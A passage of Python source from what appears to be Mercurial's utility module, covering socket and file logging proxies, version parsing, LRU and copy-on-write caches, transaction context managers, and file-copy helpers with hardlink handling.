806 806 def write(self, res, data):
807 807 if not self.writes:
808 808 return
809 809
810 810 # Python 2 returns None from some write() calls. Python 3 (reasonably)
811 811 # returns the integer bytes written.
812 812 if res is None and data:
813 813 res = len(data)
814 814
815 815 if self.logdataapis:
816 816 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
817 817
818 818 self._writedata(data)
819 819
820 820 def flush(self, res):
821 821 if not self.writes:
822 822 return
823 823
824 824 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
825 825
826 826 # For observedbufferedinputpipe.
827 827 def bufferedread(self, res, size):
828 828 if not self.reads:
829 829 return
830 830
831 831 if self.logdataapis:
832 832 self.fh.write('%s> bufferedread(%d) -> %d' % (
833 833 self.name, size, len(res)))
834 834
835 835 self._writedata(res)
836 836
837 837 def bufferedreadline(self, res):
838 838 if not self.reads:
839 839 return
840 840
841 841 if self.logdataapis:
842 842 self.fh.write('%s> bufferedreadline() -> %d' % (
843 843 self.name, len(res)))
844 844
845 845 self._writedata(res)
846 846
847 847 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
848 848 logdata=False, logdataapis=True):
849 849 """Turn a file object into a logging file object."""
850 850
851 851 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
852 852 logdata=logdata, logdataapis=logdataapis)
853 853 return fileobjectproxy(fh, observer)
854 854
855 855 class socketobserver(baseproxyobserver):
856 856 """Logs socket activity."""
857 857 def __init__(self, fh, name, reads=True, writes=True, states=True,
858 858 logdata=False, logdataapis=True):
859 859 self.fh = fh
860 860 self.name = name
861 861 self.reads = reads
862 862 self.writes = writes
863 863 self.states = states
864 864 self.logdata = logdata
865 865 self.logdataapis = logdataapis
866 866
867 867 def makefile(self, res, mode=None, bufsize=None):
868 868 if not self.states:
869 869 return
870 870
871 871 self.fh.write('%s> makefile(%r, %r)\n' % (
872 872 self.name, mode, bufsize))
873 873
874 874 def recv(self, res, size, flags=0):
875 875 if not self.reads:
876 876 return
877 877
878 878 if self.logdataapis:
879 879 self.fh.write('%s> recv(%d, %d) -> %d' % (
880 880 self.name, size, flags, len(res)))
881 881 self._writedata(res)
882 882
883 883 def recvfrom(self, res, size, flags=0):
884 884 if not self.reads:
885 885 return
886 886
887 887 if self.logdataapis:
888 888 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
889 889 self.name, size, flags, len(res[0])))
890 890
891 891 self._writedata(res[0])
892 892
893 893 def recvfrom_into(self, res, buf, size, flags=0):
894 894 if not self.reads:
895 895 return
896 896
897 897 if self.logdataapis:
898 898 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
899 899 self.name, size, flags, res[0]))
900 900
901 901 self._writedata(buf[0:res[0]])
902 902
903 903 def recv_into(self, res, buf, size=0, flags=0):
904 904 if not self.reads:
905 905 return
906 906
907 907 if self.logdataapis:
908 908 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
909 909 self.name, size, flags, res))
910 910
911 911 self._writedata(buf[0:res])
912 912
913 913 def send(self, res, data, flags=0):
914 914 if not self.writes:
915 915 return
916 916
917 917 self.fh.write('%s> send(%d, %d) -> %d' % (
918 918 self.name, len(data), flags, len(res)))
919 919 self._writedata(data)
920 920
921 921 def sendall(self, res, data, flags=0):
922 922 if not self.writes:
923 923 return
924 924
925 925 if self.logdataapis:
926 926 # Returns None on success. So don't bother reporting return value.
927 927 self.fh.write('%s> sendall(%d, %d)' % (
928 928 self.name, len(data), flags))
929 929
930 930 self._writedata(data)
931 931
932 932 def sendto(self, res, data, flagsoraddress, address=None):
933 933 if not self.writes:
934 934 return
935 935
936 936 if address:
937 937 flags = flagsoraddress
938 938 else:
939 939 flags = 0
940 940
941 941 if self.logdataapis:
942 942 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
943 943 self.name, len(data), flags, address, res))
944 944
945 945 self._writedata(data)
946 946
947 947 def setblocking(self, res, flag):
948 948 if not self.states:
949 949 return
950 950
951 951 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
952 952
953 953 def settimeout(self, res, value):
954 954 if not self.states:
955 955 return
956 956
957 957 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
958 958
959 959 def gettimeout(self, res):
960 960 if not self.states:
961 961 return
962 962
963 963 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
964 964
965 965 def setsockopt(self, res, level, optname, value):
966 966 if not self.states:
967 967 return
968 968
969 969 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
970 970 self.name, level, optname, value, res))
971 971
972 972 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
973 973 logdata=False, logdataapis=True):
974 974 """Turn a socket into a logging socket."""
975 975
976 976 observer = socketobserver(logh, name, reads=reads, writes=writes,
977 977 states=states, logdata=logdata,
978 978 logdataapis=logdataapis)
979 979 return socketproxy(fh, observer)
980 980
981 981 def version():
982 982 """Return version information if available."""
983 983 try:
984 984 from . import __version__
985 985 return __version__.version
986 986 except ImportError:
987 987 return 'unknown'
988 988
989 989 def versiontuple(v=None, n=4):
990 990 """Parses a Mercurial version string into an N-tuple.
991 991
992 992 The version string to be parsed is specified with the ``v`` argument.
993 993 If it isn't defined, the current Mercurial version string will be parsed.
994 994
995 995 ``n`` can be 2, 3, or 4. Here is how some version strings map to
996 996 returned values:
997 997
998 998 >>> v = b'3.6.1+190-df9b73d2d444'
999 999 >>> versiontuple(v, 2)
1000 1000 (3, 6)
1001 1001 >>> versiontuple(v, 3)
1002 1002 (3, 6, 1)
1003 1003 >>> versiontuple(v, 4)
1004 1004 (3, 6, 1, '190-df9b73d2d444')
1005 1005
1006 1006 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1007 1007 (3, 6, 1, '190-df9b73d2d444+20151118')
1008 1008
1009 1009 >>> v = b'3.6'
1010 1010 >>> versiontuple(v, 2)
1011 1011 (3, 6)
1012 1012 >>> versiontuple(v, 3)
1013 1013 (3, 6, None)
1014 1014 >>> versiontuple(v, 4)
1015 1015 (3, 6, None, None)
1016 1016
1017 1017 >>> v = b'3.9-rc'
1018 1018 >>> versiontuple(v, 2)
1019 1019 (3, 9)
1020 1020 >>> versiontuple(v, 3)
1021 1021 (3, 9, None)
1022 1022 >>> versiontuple(v, 4)
1023 1023 (3, 9, None, 'rc')
1024 1024
1025 1025 >>> v = b'3.9-rc+2-02a8fea4289b'
1026 1026 >>> versiontuple(v, 2)
1027 1027 (3, 9)
1028 1028 >>> versiontuple(v, 3)
1029 1029 (3, 9, None)
1030 1030 >>> versiontuple(v, 4)
1031 1031 (3, 9, None, 'rc+2-02a8fea4289b')
1032 1032
1033 1033 >>> versiontuple(b'4.6rc0')
1034 1034 (4, 6, None, 'rc0')
1035 1035 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1036 1036 (4, 6, None, 'rc0+12-425d55e54f98')
1037 1037 >>> versiontuple(b'.1.2.3')
1038 1038 (None, None, None, '.1.2.3')
1039 1039 >>> versiontuple(b'12.34..5')
1040 1040 (12, 34, None, '..5')
1041 1041 >>> versiontuple(b'1.2.3.4.5.6')
1042 1042 (1, 2, 3, '.4.5.6')
1043 1043 """
1044 1044 if not v:
1045 1045 v = version()
1046 1046 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1047 1047 if not m:
1048 1048 vparts, extra = '', v
1049 1049 elif m.group(2):
1050 1050 vparts, extra = m.groups()
1051 1051 else:
1052 1052 vparts, extra = m.group(1), None
1053 1053
1054 1054 vints = []
1055 1055 for i in vparts.split('.'):
1056 1056 try:
1057 1057 vints.append(int(i))
1058 1058 except ValueError:
1059 1059 break
1060 1060 # (3, 6) -> (3, 6, None)
1061 1061 while len(vints) < 3:
1062 1062 vints.append(None)
1063 1063
1064 1064 if n == 2:
1065 1065 return (vints[0], vints[1])
1066 1066 if n == 3:
1067 1067 return (vints[0], vints[1], vints[2])
1068 1068 if n == 4:
1069 1069 return (vints[0], vints[1], vints[2], extra)
1070 1070
1071 1071 def cachefunc(func):
1072 1072 '''cache the result of function calls'''
1073 1073 # XXX doesn't handle keywords args
1074 1074 if func.__code__.co_argcount == 0:
1075 1075 cache = []
1076 1076 def f():
1077 1077 if len(cache) == 0:
1078 1078 cache.append(func())
1079 1079 return cache[0]
1080 1080 return f
1081 1081 cache = {}
1082 1082 if func.__code__.co_argcount == 1:
1083 1083 # we gain a small amount of time because
1084 1084 # we don't need to pack/unpack the list
1085 1085 def f(arg):
1086 1086 if arg not in cache:
1087 1087 cache[arg] = func(arg)
1088 1088 return cache[arg]
1089 1089 else:
1090 1090 def f(*args):
1091 1091 if args not in cache:
1092 1092 cache[args] = func(*args)
1093 1093 return cache[args]
1094 1094
1095 1095 return f
1096 1096
1097 1097 class cow(object):
1098 1098 """helper class to make copy-on-write easier
1099 1099
1100 1100 Call preparewrite before doing any writes.
1101 1101 """
1102 1102
1103 1103 def preparewrite(self):
1104 1104 """call this before writes, return self or a copied new object"""
1105 1105 if getattr(self, '_copied', 0):
1106 1106 self._copied -= 1
1107 1107 return self.__class__(self)
1108 1108 return self
1109 1109
1110 1110 def copy(self):
1111 1111 """always do a cheap copy"""
1112 1112 self._copied = getattr(self, '_copied', 0) + 1
1113 1113 return self
1114 1114
1115 1115 class sortdict(collections.OrderedDict):
1116 1116 '''a simple sorted dictionary
1117 1117
1118 1118 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1119 1119 >>> d2 = d1.copy()
1120 1120 >>> d2
1121 1121 sortdict([('a', 0), ('b', 1)])
1122 1122 >>> d2.update([(b'a', 2)])
1123 1123 >>> list(d2.keys()) # should still be in last-set order
1124 1124 ['b', 'a']
1125 1125 '''
1126 1126
1127 1127 def __setitem__(self, key, value):
1128 1128 if key in self:
1129 1129 del self[key]
1130 1130 super(sortdict, self).__setitem__(key, value)
1131 1131
1132 1132 if pycompat.ispypy:
1133 1133 # __setitem__() isn't called as of PyPy 5.8.0
1134 1134 def update(self, src):
1135 1135 if isinstance(src, dict):
1136 1136 src = src.iteritems()
1137 1137 for k, v in src:
1138 1138 self[k] = v
1139 1139
1140 1140 class cowdict(cow, dict):
1141 1141 """copy-on-write dict
1142 1142
1143 1143 Be sure to call d = d.preparewrite() before writing to d.
1144 1144
1145 1145 >>> a = cowdict()
1146 1146 >>> a is a.preparewrite()
1147 1147 True
1148 1148 >>> b = a.copy()
1149 1149 >>> b is a
1150 1150 True
1151 1151 >>> c = b.copy()
1152 1152 >>> c is a
1153 1153 True
1154 1154 >>> a = a.preparewrite()
1155 1155 >>> b is a
1156 1156 False
1157 1157 >>> a is a.preparewrite()
1158 1158 True
1159 1159 >>> c = c.preparewrite()
1160 1160 >>> b is c
1161 1161 False
1162 1162 >>> b is b.preparewrite()
1163 1163 True
1164 1164 """
1165 1165
1166 1166 class cowsortdict(cow, sortdict):
1167 1167 """copy-on-write sortdict
1168 1168
1169 1169 Be sure to call d = d.preparewrite() before writing to d.
1170 1170 """
1171 1171
1172 1172 class transactional(object):
1173 1173 """Base class for making a transactional type into a context manager."""
1174 1174 __metaclass__ = abc.ABCMeta
1175 1175
1176 1176 @abc.abstractmethod
1177 1177 def close(self):
1178 1178 """Successfully closes the transaction."""
1179 1179
1180 1180 @abc.abstractmethod
1181 1181 def release(self):
1182 1182 """Marks the end of the transaction.
1183 1183
1184 1184 If the transaction has not been closed, it will be aborted.
1185 1185 """
1186 1186
1187 1187 def __enter__(self):
1188 1188 return self
1189 1189
1190 1190 def __exit__(self, exc_type, exc_val, exc_tb):
1191 1191 try:
1192 1192 if exc_type is None:
1193 1193 self.close()
1194 1194 finally:
1195 1195 self.release()
1196 1196
1197 1197 @contextlib.contextmanager
1198 1198 def acceptintervention(tr=None):
1199 1199 """A context manager that closes the transaction on InterventionRequired
1200 1200
1201 1201 If no transaction was provided, this simply runs the body and returns
1202 1202 """
1203 1203 if not tr:
1204 1204 yield
1205 1205 return
1206 1206 try:
1207 1207 yield
1208 1208 tr.close()
1209 1209 except error.InterventionRequired:
1210 1210 tr.close()
1211 1211 raise
1212 1212 finally:
1213 1213 tr.release()
1214 1214
1215 1215 @contextlib.contextmanager
1216 1216 def nullcontextmanager():
1217 1217 yield
1218 1218
1219 1219 class _lrucachenode(object):
1220 1220 """A node in a doubly linked list.
1221 1221
1222 1222 Holds a reference to nodes on either side as well as a key-value
1223 1223 pair for the dictionary entry.
1224 1224 """
1225 1225 __slots__ = (r'next', r'prev', r'key', r'value', r'cost')
1226 1226
1227 1227 def __init__(self):
1228 1228 self.next = None
1229 1229 self.prev = None
1230 1230
1231 1231 self.key = _notset
1232 1232 self.value = None
1233 1233 self.cost = 0
1234 1234
1235 1235 def markempty(self):
1236 1236 """Mark the node as emptied."""
1237 1237 self.key = _notset
1238 1238 self.value = None
1239 1239 self.cost = 0
1240 1240
1241 1241 class lrucachedict(object):
1242 1242 """Dict that caches most recent accesses and sets.
1243 1243
1244 1244 The dict consists of an actual backing dict - indexed by original
1245 1245 key - and a doubly linked circular list defining the order of entries in
1246 1246 the cache.
1247 1247
1248 1248 The head node is the newest entry in the cache. If the cache is full,
1249 1249 we recycle head.prev and make it the new head. Cache accesses result in
1250 1250 the node being moved to before the existing head and being marked as the
1251 1251 new head node.
1252 1252
1253 1253 Items in the cache can be inserted with an optional "cost" value. This is
1254 1254 simply an integer that is specified by the caller. The cache can be queried
1255 1255 for the total cost of all items presently in the cache.
1256 1256
1257 1257 The cache can also define a maximum cost. If a cache insertion would
1258 1258 cause the total cost of the cache to go beyond the maximum cost limit,
1259 1259 nodes will be evicted to make room for the new code. This can be used
1260 1260 to e.g. set a max memory limit and associate an estimated bytes size
1261 1261 cost to each item in the cache. By default, no maximum cost is enforced.
1262 1262 """
1263 1263 def __init__(self, max, maxcost=0):
1264 1264 self._cache = {}
1265 1265
1266 1266 self._head = head = _lrucachenode()
1267 1267 head.prev = head
1268 1268 head.next = head
1269 1269 self._size = 1
1270 1270 self.capacity = max
1271 1271 self.totalcost = 0
1272 1272 self.maxcost = maxcost
1273 1273
1274 1274 def __len__(self):
1275 1275 return len(self._cache)
1276 1276
1277 1277 def __contains__(self, k):
1278 1278 return k in self._cache
1279 1279
1280 1280 def __iter__(self):
1281 1281 # We don't have to iterate in cache order, but why not.
1282 1282 n = self._head
1283 1283 for i in range(len(self._cache)):
1284 1284 yield n.key
1285 1285 n = n.next
1286 1286
1287 1287 def __getitem__(self, k):
1288 1288 node = self._cache[k]
1289 1289 self._movetohead(node)
1290 1290 return node.value
1291 1291
1292 1292 def insert(self, k, v, cost=0):
1293 1293 """Insert a new item in the cache with optional cost value."""
1294 1294 node = self._cache.get(k)
1295 1295 # Replace existing value and mark as newest.
1296 1296 if node is not None:
1297 1297 self.totalcost -= node.cost
1298 1298 node.value = v
1299 1299 node.cost = cost
1300 1300 self.totalcost += cost
1301 1301 self._movetohead(node)
1302 1302
1303 1303 if self.maxcost:
1304 1304 self._enforcecostlimit()
1305 1305
1306 1306 return
1307 1307
1308 1308 if self._size < self.capacity:
1309 1309 node = self._addcapacity()
1310 1310 else:
1311 1311 # Grab the last/oldest item.
1312 1312 node = self._head.prev
1313 1313
1314 1314 # At capacity. Kill the old entry.
1315 1315 if node.key is not _notset:
1316 1316 self.totalcost -= node.cost
1317 1317 del self._cache[node.key]
1318 1318
1319 1319 node.key = k
1320 1320 node.value = v
1321 1321 node.cost = cost
1322 1322 self.totalcost += cost
1323 1323 self._cache[k] = node
1324 1324 # And mark it as newest entry. No need to adjust order since it
1325 1325 # is already self._head.prev.
1326 1326 self._head = node
1327 1327
1328 1328 if self.maxcost:
1329 1329 self._enforcecostlimit()
1330 1330
1331 1331 def __setitem__(self, k, v):
1332 1332 self.insert(k, v)
1333 1333
1334 1334 def __delitem__(self, k):
1335 1335 self.pop(k)
1336 1336
1337 1337 def pop(self, k, default=_notset):
1338 1338 try:
1339 1339 node = self._cache.pop(k)
1340 1340 except KeyError:
1341 1341 if default is _notset:
1342 1342 raise
1343 1343 return default
1344 1344 value = node.value
1345 1345 self.totalcost -= node.cost
1346 1346 node.markempty()
1347 1347
1348 1348 # Temporarily mark as newest item before re-adjusting head to make
1349 1349 # this node the oldest item.
1350 1350 self._movetohead(node)
1351 1351 self._head = node.next
1352 1352
1353 1353 return value
1354 1354
1355 1355 # Additional dict methods.
1356 1356
1357 1357 def get(self, k, default=None):
1358 1358 try:
1359 1359 return self.__getitem__(k)
1360 1360 except KeyError:
1361 1361 return default
1362 1362
1363 1363 def peek(self, k, default=_notset):
1364 1364 """Get the specified item without moving it to the head
1365 1365
1366 1366 Unlike get(), this doesn't mutate the internal state. But be aware
1367 1367 that it doesn't mean peek() is thread safe.
1368 1368 """
1369 1369 try:
1370 1370 node = self._cache[k]
1371 1371 return node.value
1372 1372 except KeyError:
1373 1373 if default is _notset:
1374 1374 raise
1375 1375 return default
1376 1376
1377 1377 def clear(self):
1378 1378 n = self._head
1379 1379 while n.key is not _notset:
1380 1380 self.totalcost -= n.cost
1381 1381 n.markempty()
1382 1382 n = n.next
1383 1383
1384 1384 self._cache.clear()
1385 1385
1386 1386 def copy(self, capacity=None, maxcost=0):
1387 1387 """Create a new cache as a copy of the current one.
1388 1388
1389 1389 By default, the new cache has the same capacity as the existing one.
1390 1390 But, the cache capacity can be changed as part of performing the
1391 1391 copy.
1392 1392
1393 1393 Items in the copy have an insertion/access order matching this
1394 1394 instance.
1395 1395 """
1396 1396
1397 1397 capacity = capacity or self.capacity
1398 1398 maxcost = maxcost or self.maxcost
1399 1399 result = lrucachedict(capacity, maxcost=maxcost)
1400 1400
1401 1401 # We copy entries by iterating in oldest-to-newest order so the copy
1402 1402 # has the correct ordering.
1403 1403
1404 1404 # Find the first non-empty entry.
1405 1405 n = self._head.prev
1406 1406 while n.key is _notset and n is not self._head:
1407 1407 n = n.prev
1408 1408
1409 1409 # We could potentially skip the first N items when decreasing capacity.
1410 1410 # But let's keep it simple unless it is a performance problem.
1411 1411 for i in range(len(self._cache)):
1412 1412 result.insert(n.key, n.value, cost=n.cost)
1413 1413 n = n.prev
1414 1414
1415 1415 return result
1416 1416
1417 1417 def popoldest(self):
1418 1418 """Remove the oldest item from the cache.
1419 1419
1420 1420 Returns the (key, value) describing the removed cache entry.
1421 1421 """
1422 1422 if not self._cache:
1423 1423 return
1424 1424
1425 1425 # Walk the linked list backwards starting at tail node until we hit
1426 1426 # a non-empty node.
1427 1427 n = self._head.prev
1428 1428 while n.key is _notset:
1429 1429 n = n.prev
1430 1430
1431 1431 key, value = n.key, n.value
1432 1432
1433 1433 # And remove it from the cache and mark it as empty.
1434 1434 del self._cache[n.key]
1435 1435 self.totalcost -= n.cost
1436 1436 n.markempty()
1437 1437
1438 1438 return key, value
1439 1439
1440 1440 def _movetohead(self, node):
1441 1441 """Mark a node as the newest, making it the new head.
1442 1442
1443 1443 When a node is accessed, it becomes the freshest entry in the LRU
1444 1444 list, which is denoted by self._head.
1445 1445
1446 1446 Visually, let's make ``N`` the new head node (* denotes head):
1447 1447
1448 1448 previous/oldest <-> head <-> next/next newest
1449 1449
1450 1450 ----<->--- A* ---<->-----
1451 1451 | |
1452 1452 E <-> D <-> N <-> C <-> B
1453 1453
1454 1454 To:
1455 1455
1456 1456 ----<->--- N* ---<->-----
1457 1457 | |
1458 1458 E <-> D <-> C <-> B <-> A
1459 1459
1460 1460 This requires the following moves:
1461 1461
1462 1462 C.next = D (node.prev.next = node.next)
1463 1463 D.prev = C (node.next.prev = node.prev)
1464 1464 E.next = N (head.prev.next = node)
1465 1465 N.prev = E (node.prev = head.prev)
1466 1466 N.next = A (node.next = head)
1467 1467 A.prev = N (head.prev = node)
1468 1468 """
1469 1469 head = self._head
1470 1470 # C.next = D
1471 1471 node.prev.next = node.next
1472 1472 # D.prev = C
1473 1473 node.next.prev = node.prev
1474 1474 # N.prev = E
1475 1475 node.prev = head.prev
1476 1476 # N.next = A
1477 1477 # It is tempting to do just "head" here, however if node is
1478 1478 # adjacent to head, this will do bad things.
1479 1479 node.next = head.prev.next
1480 1480 # E.next = N
1481 1481 node.next.prev = node
1482 1482 # A.prev = N
1483 1483 node.prev.next = node
1484 1484
1485 1485 self._head = node
1486 1486
1487 1487 def _addcapacity(self):
1488 1488 """Add a node to the circular linked list.
1489 1489
1490 1490 The new node is inserted before the head node.
1491 1491 """
1492 1492 head = self._head
1493 1493 node = _lrucachenode()
1494 1494 head.prev.next = node
1495 1495 node.prev = head.prev
1496 1496 node.next = head
1497 1497 head.prev = node
1498 1498 self._size += 1
1499 1499 return node
1500 1500
1501 1501 def _enforcecostlimit(self):
1502 1502 # This should run after an insertion. It should only be called if total
1503 1503 # cost limits are being enforced.
1504 1504 # The most recently inserted node is never evicted.
1505 1505 if len(self) <= 1 or self.totalcost <= self.maxcost:
1506 1506 return
1507 1507
1508 1508 # This is logically equivalent to calling popoldest() until we
1509 1509 # free up enough cost. We don't do that since popoldest() needs
1510 1510 # to walk the linked list and doing this in a loop would be
1511 1511 # quadratic. So we find the first non-empty node and then
1512 1512 # walk nodes until we free up enough capacity.
1513 1513 #
1514 1514 # If we only removed the minimum number of nodes to free enough
1515 1515 # cost at insert time, chances are high that the next insert would
1516 1516 # also require pruning. This would effectively constitute quadratic
1517 1517 # behavior for insert-heavy workloads. To mitigate this, we set a
1518 1518 # target cost that is a percentage of the max cost. This will tend
1519 1519 # to free more nodes when the high water mark is reached, which
1520 1520 # lowers the chances of needing to prune on the subsequent insert.
1521 1521 targetcost = int(self.maxcost * 0.75)
1522 1522
1523 1523 n = self._head.prev
1524 1524 while n.key is _notset:
1525 1525 n = n.prev
1526 1526
1527 1527 while len(self) > 1 and self.totalcost > targetcost:
1528 1528 del self._cache[n.key]
1529 1529 self.totalcost -= n.cost
1530 1530 n.markempty()
1531 1531 n = n.prev
1532 1532
1533 1533 def lrucachefunc(func):
1534 1534 '''cache most recent results of function calls'''
1535 1535 cache = {}
1536 1536 order = collections.deque()
1537 1537 if func.__code__.co_argcount == 1:
1538 1538 def f(arg):
1539 1539 if arg not in cache:
1540 1540 if len(cache) > 20:
1541 1541 del cache[order.popleft()]
1542 1542 cache[arg] = func(arg)
1543 1543 else:
1544 1544 order.remove(arg)
1545 1545 order.append(arg)
1546 1546 return cache[arg]
1547 1547 else:
1548 1548 def f(*args):
1549 1549 if args not in cache:
1550 1550 if len(cache) > 20:
1551 1551 del cache[order.popleft()]
1552 1552 cache[args] = func(*args)
1553 1553 else:
1554 1554 order.remove(args)
1555 1555 order.append(args)
1556 1556 return cache[args]
1557 1557
1558 1558 return f
1559 1559
1560 1560 class propertycache(object):
1561 1561 def __init__(self, func):
1562 1562 self.func = func
1563 1563 self.name = func.__name__
1564 1564 def __get__(self, obj, type=None):
1565 1565 result = self.func(obj)
1566 1566 self.cachevalue(obj, result)
1567 1567 return result
1568 1568
1569 1569 def cachevalue(self, obj, value):
1570 1570 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1571 1571 obj.__dict__[self.name] = value
1572 1572
1573 1573 def clearcachedproperty(obj, prop):
1574 1574 '''clear a cached property value, if one has been set'''
1575 1575 prop = pycompat.sysstr(prop)
1576 1576 if prop in obj.__dict__:
1577 1577 del obj.__dict__[prop]
1578 1578
1579 1579 def increasingchunks(source, min=1024, max=65536):
1580 1580 '''return no less than min bytes per chunk while data remains,
1581 1581 doubling min after each chunk until it reaches max'''
1582 1582 def log2(x):
1583 1583 if not x:
1584 1584 return 0
1585 1585 i = 0
1586 1586 while x:
1587 1587 x >>= 1
1588 1588 i += 1
1589 1589 return i - 1
1590 1590
1591 1591 buf = []
1592 1592 blen = 0
1593 1593 for chunk in source:
1594 1594 buf.append(chunk)
1595 1595 blen += len(chunk)
1596 1596 if blen >= min:
1597 1597 if min < max:
1598 1598 min = min << 1
1599 1599 nmin = 1 << log2(blen)
1600 1600 if nmin > min:
1601 1601 min = nmin
1602 1602 if min > max:
1603 1603 min = max
1604 1604 yield ''.join(buf)
1605 1605 blen = 0
1606 1606 buf = []
1607 1607 if buf:
1608 1608 yield ''.join(buf)
1609 1609
1610 1610 def always(fn):
1611 1611 return True
1612 1612
1613 1613 def never(fn):
1614 1614 return False
1615 1615
1616 1616 def nogc(func):
1617 1617 """disable garbage collector
1618 1618
1619 1619 Python's garbage collector triggers a GC each time a certain number of
1620 1620 container objects (the number being defined by gc.get_threshold()) are
1621 1621 allocated even when marked not to be tracked by the collector. Tracking has
1622 1622 no effect on when GCs are triggered, only on what objects the GC looks
1623 1623 into. As a workaround, disable GC while building complex (huge)
1624 1624 containers.
1625 1625
1626 1626 This garbage collector issue have been fixed in 2.7. But it still affect
1627 1627 CPython's performance.
1628 1628 """
1629 1629 def wrapper(*args, **kwargs):
1630 1630 gcenabled = gc.isenabled()
1631 1631 gc.disable()
1632 1632 try:
1633 1633 return func(*args, **kwargs)
1634 1634 finally:
1635 1635 if gcenabled:
1636 1636 gc.enable()
1637 1637 return wrapper
1638 1638
1639 1639 if pycompat.ispypy:
1640 1640 # PyPy runs slower with gc disabled
1641 1641 nogc = lambda x: x
1642 1642
1643 1643 def pathto(root, n1, n2):
1644 1644 '''return the relative path from one place to another.
1645 1645 root should use os.sep to separate directories
1646 1646 n1 should use os.sep to separate directories
1647 1647 n2 should use "/" to separate directories
1648 1648 returns an os.sep-separated path.
1649 1649
1650 1650 If n1 is a relative path, it's assumed it's
1651 1651 relative to root.
1652 1652 n2 should always be relative to root.
1653 1653 '''
1654 1654 if not n1:
1655 1655 return localpath(n2)
1656 1656 if os.path.isabs(n1):
1657 1657 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1658 1658 return os.path.join(root, localpath(n2))
1659 1659 n2 = '/'.join((pconvert(root), n2))
1660 1660 a, b = splitpath(n1), n2.split('/')
1661 1661 a.reverse()
1662 1662 b.reverse()
1663 1663 while a and b and a[-1] == b[-1]:
1664 1664 a.pop()
1665 1665 b.pop()
1666 1666 b.reverse()
1667 1667 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1668 1668
1669 1669 # the location of data files matching the source code
1670 1670 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1671 1671 # executable version (py2exe) doesn't support __file__
1672 1672 datapath = os.path.dirname(pycompat.sysexecutable)
1673 1673 else:
1674 1674 datapath = os.path.dirname(pycompat.fsencode(__file__))
1675 1675
1676 1676 i18n.setdatapath(datapath)
1677 1677
1678 1678 def checksignature(func):
1679 1679 '''wrap a function with code to check for calling errors'''
1680 1680 def check(*args, **kwargs):
1681 1681 try:
1682 1682 return func(*args, **kwargs)
1683 1683 except TypeError:
1684 1684 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1685 1685 raise error.SignatureError
1686 1686 raise
1687 1687
1688 1688 return check
1689 1689
1690 1690 # a whilelist of known filesystems where hardlink works reliably
1691 1691 _hardlinkfswhitelist = {
1692 1692 'apfs',
1693 1693 'btrfs',
1694 1694 'ext2',
1695 1695 'ext3',
1696 1696 'ext4',
1697 1697 'hfs',
1698 1698 'jfs',
1699 1699 'NTFS',
1700 1700 'reiserfs',
1701 1701 'tmpfs',
1702 1702 'ufs',
1703 1703 'xfs',
1704 1704 'zfs',
1705 1705 }
1706 1706
1707 1707 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1708 1708 '''copy a file, preserving mode and optionally other stat info like
1709 1709 atime/mtime
1710 1710
1711 1711 checkambig argument is used with filestat, and is useful only if
1712 1712 destination file is guarded by any lock (e.g. repo.lock or
1713 1713 repo.wlock).
1714 1714
1715 1715 copystat and checkambig should be exclusive.
1716 1716 '''
1717 1717 assert not (copystat and checkambig)
1718 1718 oldstat = None
1719 1719 if os.path.lexists(dest):
1720 1720 if checkambig:
1721 1721 oldstat = checkambig and filestat.frompath(dest)
1722 1722 unlink(dest)
1723 1723 if hardlink:
1724 1724 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1725 1725 # unless we are confident that dest is on a whitelisted filesystem.
1726 1726 try:
1727 1727 fstype = getfstype(os.path.dirname(dest))
1728 1728 except OSError:
1729 1729 fstype = None
1730 1730 if fstype not in _hardlinkfswhitelist:
1731 1731 hardlink = False
1732 1732 if hardlink:
1733 1733 try:
1734 1734 oslink(src, dest)
1735 1735 return
1736 1736 except (IOError, OSError):
1737 1737 pass # fall back to normal copy
1738 1738 if os.path.islink(src):
1739 1739 os.symlink(os.readlink(src), dest)
1740 1740 # copytime is ignored for symlinks, but in general copytime isn't needed
1741 1741 # for them anyway
1742 1742 else:
1743 1743 try:
1744 1744 shutil.copyfile(src, dest)
1745 1745 if copystat:
1746 1746 # copystat also copies mode
1747 1747 shutil.copystat(src, dest)
1748 1748 else:
1749 1749 shutil.copymode(src, dest)
1750 1750 if oldstat and oldstat.stat:
1751 1751 newstat = filestat.frompath(dest)
1752 1752 if newstat.isambig(oldstat):
1753 1753 # stat of copied file is ambiguous to original one
1754 1754 advanced = (
1755 1755 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1756 1756 os.utime(dest, (advanced, advanced))
1757 1757 except shutil.Error as inst:
1758 1758 raise error.Abort(str(inst))
1759 1759
1760 1760 def copyfiles(src, dst, hardlink=None, progress=None):
1761 1761 """Copy a directory tree using hardlinks if possible."""
1762 1762 num = 0
1763 1763
1764 1764 def settopic():
1765 1765 if progress:
1766 1766 progress.topic = _('linking') if hardlink else _('copying')
1767 1767
1768 1768 if os.path.isdir(src):
1769 1769 if hardlink is None:
1770 1770 hardlink = (os.stat(src).st_dev ==
1771 1771 os.stat(os.path.dirname(dst)).st_dev)
1772 1772 settopic()
1773 1773 os.mkdir(dst)
1774 1774 for name, kind in listdir(src):
1775 1775 srcname = os.path.join(src, name)
1776 1776 dstname = os.path.join(dst, name)
